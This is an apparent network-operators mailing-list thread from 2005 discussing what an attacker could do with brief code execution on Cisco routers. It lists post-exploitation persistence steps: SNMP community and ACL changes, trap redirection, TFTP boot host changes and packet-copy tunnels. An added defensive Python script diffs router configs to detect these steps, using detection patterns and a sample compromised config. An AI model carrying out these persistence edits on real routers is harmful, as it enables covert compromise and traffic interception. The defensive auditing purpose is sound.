RE: "Cisco gate" - Payload Versus Vector
very helpful analysis. some questions: even without stifling the heap check via crashing_already (i.e. a 'fix' is developed for that weakness), is the 30-60 second window sufficient to do serious operational damage? i.e. what could an attacker do with a code injection with a mean life as short as 15-30 seconds? that seems a bit short for a direct routing injection of much worth. but how about a damping attack (flap the victim's route enough to cause everyone to damp them), or would mrai stifle that? could it be used to cascade to a neighbor? i suppose that diverting just the right 15-30 seconds of traffic could be profitable. secondly, is there reason not to believe that the attack vectors might be at layer two, mpls, as well as layer three, ip? i.e. the "internet-free core" gambit does not reduce exposure to this one?
The "bad guys" are discussing the issues and we should think long and hard before we muzzle the "good guys".
http://rip.psg.com/~randy/draft-ymbk-obscurity-00.txt is a bit old, but seems relevant. randy
On Tue, 2 Aug 2005, Randy Bush wrote:
> even without stifling the heap check via crashing_already (i.e. a 'fix' is developed for that weakness), is the 30-60 second window sufficient to do serious operational damage? i.e. what could an attacker do with a code injection with a mean life as short as 15-30 seconds?
change the passwords and write to nvram, and come back later?

-Dan
On Tue, 2005-08-02 at 15:29 -0700, Dan Hollis wrote:
On Tue, 2 Aug 2005, Randy Bush wrote:
> > even without stifling the heap check via crashing_already (i.e. a 'fix' is developed for that weakness), is the 30-60 second window sufficient to do serious operational damage? i.e. what could an attacker do with a code injection with a mean life as short as 15-30 seconds?
> change the passwords and write to nvram, and come back later?
some more that come to mind, as ssh/enable pw changes wouldn't go unnoticed for too long:
- change snmptrap dest
- change snmp r/w comstrs (most monitoring would only use r/o comstrs)
- change ACLs on snmp access to allow public IPs
- change the ip address of the host that is used for tftp boots
lots of things can be done in 1/10 of the 30-60 second window.

-Jim P.
Randy Bush wrote:
> very helpful analysis. some questions:
> mrai stifle that? could it be used to cascade to a neighbor? i suppose that diverting just the right 15-30 seconds of traffic could be profitable.
More recent hardware allows you to take copies of packets and push them down an IP tunnel. Pushing something like this into the configuration would make much more sense.

Pete
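The changes Jim and Pete describe (a new RW community string, a redirected trap host, a loosened SNMP ACL, a new TFTP boot source, a packet-copy tunnel) are all things a config diff against a trusted baseline will catch long before anyone notices a changed enable password. The script below is an added example, not code from the thread or from any vendor: it diffs two Cisco IOS-style running configs and tags each added or removed line with the persistence category it falls under. Both configs are constructed for illustration, and the regexes only approximate IOS syntax for the commands named in the thread, so treat the rule table as a starting point to tune for the platforms you actually run.

```python
"""Catch quick persistence edits of the kind the thread describes by diffing
a trusted baseline of a Cisco IOS running-config against a fresh copy.
Added example, not from the thread; all config lines below are constructed
and the regexes are illustrative approximations of IOS syntax."""
import re

# (category, pattern).  Tune to your platforms; these are illustrative.
RULES = (
    ("credential change", re.compile(r"^(username\s+\S+|enable\s+(secret|password))")),
    ("snmp trap destination", re.compile(r"^snmp-server\s+host\s")),
    ("snmp RW community", re.compile(r"^snmp-server\s+community\s+\S+\s+RW\b", re.I)),
    ("snmp community ACL", re.compile(r"^snmp-server\s+community\s+\S+\s+R[OW]\s+\S+", re.I)),
    ("access-list change", re.compile(r"^(access-list\s+\d+|ip\s+access-list)")),
    ("boot / tftp source", re.compile(r"^(boot\s+(host|network|system)|service\s+config)")),
    ("traffic copy / tunnel", re.compile(r"^(monitor\s+session|ip\s+traffic-export|interface\s+Tunnel)", re.I)),
)

# Lines IOS rewrites on its own; ignored so they do not drown real changes.
NOISE = re.compile(r"^(!|ntp\s+clock-period|Building configuration|Current configuration)")


def parse(config):
    """Config text -> set of (parent, line).  Indented sub-commands keep
    their top-level block, so a 'tunnel destination' is always reported
    together with its 'interface TunnelN'."""
    entries, parent = set(), ""
    for raw in config.splitlines():
        text = raw.strip()
        if not text or NOISE.match(text):
            continue
        if raw[0].isspace():
            entries.add((parent, text))
        else:
            parent = text
            entries.add(("", text))
    return entries


def categorize(parent, line):
    """Every rule the entry, or the block enclosing it, trips."""
    return tuple(c for c, rx in RULES if rx.search(line) or (parent and rx.search(parent)))


def audit(baseline, current):
    """All added/removed entries tagged with persistence categories, sorted
    for stable output.  Removals matter too: a deleted trap host is how the
    NOC stops hearing from the box."""
    old, new = parse(baseline), parse(current)
    findings = []
    for change, entries in (("added", new - old), ("removed", old - new)):
        for parent, line in entries:
            findings.append({"change": change, "parent": parent, "line": line,
                             "categories": categorize(parent, line)})
    return sorted(findings, key=lambda f: (f["change"], f["parent"], f["line"]))


# Constructed sample: the baseline as last saved by the NOC ...
BASELINE = """\
!
hostname edge1
enable secret 5 $1$abcd$constructedhash
username noc privilege 15 secret 5 $1$efgh$constructedhash
!
interface GigabitEthernet0/0
 ip address 192.0.2.1 255.255.255.0
!
access-list 10 permit 192.0.2.0 0.0.0.255
snmp-server community n0cRead RO 10
snmp-server host 192.0.2.50 version 2c n0cRead
ntp clock-period 17180145
"""

# ... and the running-config pulled after a suspected short-lived injection.
# Passwords are untouched; the attacker changed only what monitoring ignores.
CURRENT = """\
!
hostname edge1
enable secret 5 $1$abcd$constructedhash
username noc privilege 15 secret 5 $1$efgh$constructedhash
!
boot host tftp://198.51.100.7/edge1-confg
!
interface GigabitEthernet0/0
 ip address 192.0.2.1 255.255.255.0
!
interface Tunnel0
 tunnel source GigabitEthernet0/0
 tunnel destination 198.51.100.7
!
access-list 10 permit 192.0.2.0 0.0.0.255
access-list 10 permit 198.51.100.0 0.0.0.255
snmp-server community n0cRead RO 10
snmp-server community 0wned RW
snmp-server host 198.51.100.7 version 2c n0cRead
ntp clock-period 17180150
"""

if __name__ == "__main__":
    for f in audit(BASELINE, CURRENT):
        where = f"{f['parent']} / " if f["parent"] else ""
        print(f"{f['change']:7} {where}{f['line']}  <- {', '.join(f['categories']) or 'uncategorized'}")
```

Run it against configs pulled on a schedule (or on every "config changed" trap you still receive) and alert on any finding, categorized or not; the categories just tell the on-call engineer which of the thread's scenarios they are looking at. The noise filter is deliberately short: anything the platform rewrites by itself has to be listed there explicitly, which is safer than a broad regex that would also hide an attacker's edit.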
Participants (4): Dan Hollis, Jim Popovitch, Petri Helenius, Randy Bush